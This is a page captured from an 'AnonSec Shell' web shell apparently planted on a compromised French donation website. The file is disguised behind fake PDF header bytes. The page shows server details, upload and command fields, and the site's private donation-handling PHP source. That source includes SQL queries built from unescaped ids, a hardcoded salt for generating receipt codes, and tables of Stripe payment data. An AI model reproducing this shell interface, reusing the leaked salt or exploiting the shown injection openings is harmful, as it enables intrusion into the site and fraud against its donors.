%PDF-1.3 %��C ��C ����"#Qr����&1!A"2qQa��� ?�y,�/3J�ݹ�߲؋5�Xw���y�R��I0�2�PI�I��iM��r�N&"KgX:��nTJnLK��@!�-� ���m�;�g���&�hw���@�ܗ 9�-�.�1 AnonSec Shell
AnonSec Shell
Server IP : 192.175.98.165  /  Your IP : 216.73.216.219
Web Server : Apache
System : Linux server.tobedev.com 4.18.0-553.72.1.el8_10.x86_64 #1 SMP Tue Sep 2 06:07:48 EDT 2025 x86_64
User : meir5web ( 1019)
PHP Version : 7.4.33
Disable Function : passthru,shell_exec
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/meir5web/fichiers_meirpanim/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME ]     

Current File : /home/meir5web/fichiers_meirpanim/dons.class.php
<?php
class dons{

var $id_dons;
var $titre;
var $nom;
var $prenom;
var $adresse;
var $cp;
var $ville;
var $pays;
var $tel;
var $portable;
var $email;
var $type_don;
var $montant;
var $occasion;
var $date;
var $periodicite;
var $duree;
var $du_mois;
var $du_jour;
var $nom_autre;
var $prenom_autre;
var $adresse_autre;
var $cp_autre;
var $ville_autre;
var $valide=0;
var $date_creation;
var $commentaire;
var $search=[];

function lecture()
{
	global $mysqli;
$sql="SELECT * from `tbl_dons2` where id_dons='".$this->id_dons."'";
$query=mysqli_query($mysqli,$sql)or die($sql.' '.mysqli_error());
$data=mysqli_fetch_array($query);

$this->set_vars($data);
}

function set_vars($data)
{
$this->id_dons=stripslashes($data['id_dons']);
$this->titre=stripslashes($data['titre']);
$this->nom=stripslashes($data['nom']);
$this->prenom=stripslashes($data['prenom']);
$this->adresse=stripslashes($data['adresse']);
$this->cp=stripslashes($data['cp']);
$this->ville=stripslashes($data['ville']);
$this->pays=stripslashes($data['pays']);
$this->tel=stripslashes($data['tel']);
$this->portable=stripslashes($data['portable']);
$this->email=stripslashes($data['email']);
$this->type_don=stripslashes($data['type_don']);
$this->montant=stripslashes($data['montant']);
$this->occasion=stripslashes($data['occasion']);
$this->date=stripslashes($data['date']);
$this->periodicite=stripslashes($data['periodicite']);
$this->duree=stripslashes($data['duree']);
$this->du_mois=stripslashes($data['du_mois']);
$this->du_jour=stripslashes($data['du_jour']);
$this->nom_autre=stripslashes($data['nom_autre']);
$this->prenom_autre=stripslashes($data['prenom_autre']);
$this->adresse_autre=stripslashes($data['adresse_autre']);
$this->cp_autre=stripslashes($data['cp_autre']);
$this->ville_autre=stripslashes($data['ville_autre']);
$this->valide=stripslashes($data['valide']);
$this->date_creation=stripslashes($data['date_creation']);
$this->commentaire=stripslashes($data['commentaire']);
$this->cerfaUrl=$this->getCerfaUrl($data['id_dons']);
}

function insert()
{
$sql="INSERT INTO `tbl_dons2` (
`titre` ,
`nom` ,
`prenom` ,
`adresse` ,
`cp` ,
`ville` ,
`pays` ,
`tel` ,
`portable` ,
`email` ,
`type_don` ,
`montant` ,
`occasion` ,
`date` ,
`periodicite` ,
`duree` ,
`du_mois` ,
`du_jour` ,
`nom_autre` ,
`prenom_autre` ,
`adresse_autre` ,
`cp_autre` ,
`ville_autre` ,
`valide`,
`date_creation`,
`commentaire`
)
VALUES (
'".addslashes($this->titre)."','".addslashes($this->nom)."','".addslashes($this->prenom)."','".addslashes($this->adresse)."','".addslashes($this->cp)."','".addslashes($this->ville)."','".addslashes($this->pays)."','".addslashes($this->tel)."','".addslashes($this->portable)."','".addslashes($this->email)."','".addslashes($this->type_don)."','".addslashes($this->montant)."','".addslashes($this->occasion)."','".addslashes($this->date)."','".addslashes($this->periodicite)."','".addslashes($this->duree)."','".addslashes($this->du_mois)."','".addslashes($this->du_jour)."','".addslashes($this->nom_autre)."','".addslashes($this->prenom_autre)."','".addslashes($this->adresse_autre)."','".addslashes($this->cp_autre)."','".addslashes($this->ville_autre)."','".addslashes($this->valide)."','".date("Y-m-d H:i:s")."','".addslashes($this->commentaire)."')";
global $mysqli;
mysqli_query($mysqli,$sql)or die('error don insert '.mysqli_error());

$this->id_dons=mysqli_insert_id($mysqli);

}

function update()
{
$sql="update `tbl_dons2` set titre='".addslashes($this->titre)."',nom='".addslashes($this->nom)."',prenom='".addslashes($this->prenom)."',adresse='".addslashes($this->adresse)."',cp='".addslashes($this->cp)."',ville='".addslashes($this->ville)."',pays='".addslashes($this->pays)."',tel='".addslashes($this->tel)."',portable='".addslashes($this->portable)."',email='".addslashes($this->email)."',type_don='".addslashes($this->type_don)."',montant='".addslashes($this->montant)."',occasion='".addslashes($this->occasion)."',date='".addslashes($this->date)."',periodicite='".addslashes($this->periodicite)."',duree='".addslashes($this->duree)."',du_mois='".addslashes($this->du_mois)."',du_jour='".addslashes($this->du_jour)."',nom_autre='".addslashes($this->nom_autre)."',prenom_autre='".addslashes($this->prenom_autre)."',adresse_autre='".addslashes($this->adresse_autre)."',cp_autre='".addslashes($this->cp_autre)."',ville_autre='".addslashes($this->ville_autre)."',valide='".addslashes($this->valide)."',commentaire='".addslashes($this->commentaire)."' where id_dons='".$this->id_dons."'";
global $mysqli;
mysqli_query($mysqli,$sql)or die('error don update');

}

function save()
{
	if(empty($this->id_dons)) $this->insert();
	else $this->update();
}

function get_nb_dons()
{
	global $mysqli;
	$sql="SELECT count(id_dons) from `tbl_dons2` where 1=1 ";
	if(!empty($this->search['motcle'])) $sql .=" and (nom like '%".addslashes($this->search['motcle'])."%' OR prenom like '%".addslashes($this->search['motcle'])."%' OR email like '%".addslashes($this->search['motcle'])."%' OR tel like '%".addslashes($this->search['motcle'])."%' OR portable like '%".addslashes($this->search['motcle'])."%') ";
	if(!empty($this->search['paiement']) && $this->search['paiement']==1) $sql .=" and valide = 1 ";
	if(!empty($this->search['paiement']) && $this->search['paiement']==2) $sql .=" and valide = 0 ";
	if(!empty($this->search['date_from'])) {
		$date_from_sql = DateTime::createFromFormat('d/m/Y', $this->search['date_from'])->format('Y-m-d');
		$sql .=" and date_creation >= '".$date_from_sql." 00:00:00' ";
	}
	if(!empty($this->search['date_to'])) {
		$date_to_sql = DateTime::createFromFormat('d/m/Y', $this->search['date_to'])->format('Y-m-d');
		$sql .=" and date_creation <= '".$date_to_sql." 23:59:59' ";
	}
	$query=mysqli_query($mysqli,$sql)or die($sql.' '.mysqli_error());
	$data=mysqli_fetch_array($query);
	return $data[0];
}
function get_all($limit,$nb)
{
	global $mysqli;
	$all=array();
	$sql="SELECT * from `tbl_dons2` where 1=1 ";
	if(!empty($this->search['motcle'])) $sql .=" and (nom like '%".addslashes($this->search['motcle'])."%' OR prenom like '%".addslashes($this->search['motcle'])."%' OR email like '%".addslashes($this->search['motcle'])."%' OR tel like '%".addslashes($this->search['motcle'])."%' OR portable like '%".addslashes($this->search['motcle'])."%') ";
	if(!empty($this->search['paiement']) && $this->search['paiement']==1) $sql .=" and valide = 1 ";
	if(!empty($this->search['paiement']) && $this->search['paiement']==2) $sql .=" and valide = 0 ";
	if(!empty($this->search['date_from'])) {
		$date_from_sql = DateTime::createFromFormat('d/m/Y', $this->search['date_from'])->format('Y-m-d');
		$sql .=" and date_creation >= '".$date_from_sql." 00:00:00' ";
	}
	if(!empty($this->search['date_to'])) {
		$date_to_sql = DateTime::createFromFormat('d/m/Y', $this->search['date_to'])->format('Y-m-d');
		$sql .=" and date_creation <= '".$date_to_sql." 23:59:59' ";
	}
	$sql.=" order by id_dons desc limit $limit,$nb";
	//echo $sql;
	$query=mysqli_query($mysqli,$sql)or die($sql.' '.mysqli_error());
	while($data=mysqli_fetch_array($query))
		{
			$dons = new dons;
			$dons->set_vars($data);
			$all[]=$dons;
		}
		return $all;
}

function createCerfa()
{
	 $wkhtmltopdf = "/usr/local/bin/wkhtmltopdf --margin-top 5 --margin-bottom 5 --margin-left 10 --margin-right 10 --page-height 350 ";
	 $code = $this->getCode($this->id_dons);//md5('Meir26'.$this->id_dons.'paniM27');
	 $url1 = "https://www.meirpanim.fr/cerfa/page1.php?".escapeshellarg("id=".$this->id_dons."&code=".$code)." ";
	 $url2 = "https://www.meirpanim.fr/cerfa/page2.php?".escapeshellarg("id=".$this->id_dons."&code=".$code)." ";
	
	$cerfaUrl = "/cerfa/pdf/".$code.".pdf";
	$cerfa = $_SERVER["DOCUMENT_ROOT"].$cerfaUrl;
		$commandeExec = $wkhtmltopdf." ".$url1." ".$url2;
		$commandeExec .=$cerfa;
		
		$output = [];
		$return = 0;

		exec($commandeExec,$output, $return);
		//echo $commandeExec;
		//print_r($output);
		//print_r($return);
		
		 if(is_file($cerfa))
		{
				chmod($cerfa,0446);
				//echo 'chnod '.$cerfa;
				return $cerfaUrl;
		}
	
}

function getCode($id_dons)
{
	return md5('Meir26'.$id_dons.'paniM27');
}

function getCerfaUrl($id_dons)
{
	$code = $this->getCode($id_dons);
	$cerfaUrl = "/cerfa/pdf/".$code.".pdf";
	$cerfa = $_SERVER["DOCUMENT_ROOT"].$cerfaUrl;
	 if(is_file($cerfa))
		return $cerfaUrl;
	return;
}

function getIdFromStripeDatas($stripeDatas)
{
	global $mysqli;
	$sql="select id_dons from tbl_stripe where `payment_intent` = '".addslashes($stripeDatas['payment_intent'])."' and `client_secret` = '".addslashes($stripeDatas['client_secret'])."' ";
	$query=mysqli_query($mysqli,$sql)or die($sql.' '.mysqli_error());
	$data=mysqli_fetch_array($query);
	return $data[0];
}

function insertStripeDatas($stripeDatas)
{
	$sql="INSERT INTO `tbl_stripe` (
				`id_dons` ,
				`payment_intent` ,
				`client_secret` ,
				`dateIn`
				)
		VALUES (
				'".addslashes($this->id_dons)."',
				'".addslashes($stripeDatas['payment_intent'])."',
				'".addslashes($stripeDatas['client_secret'])."',
				'".date("Y-m-d H:i:s")."'
				)";
global $mysqli;
mysqli_query($mysqli,$sql)or die('error don insertStripe '.mysqli_error());
}

}

Anon7 - 2022
AnonSec Team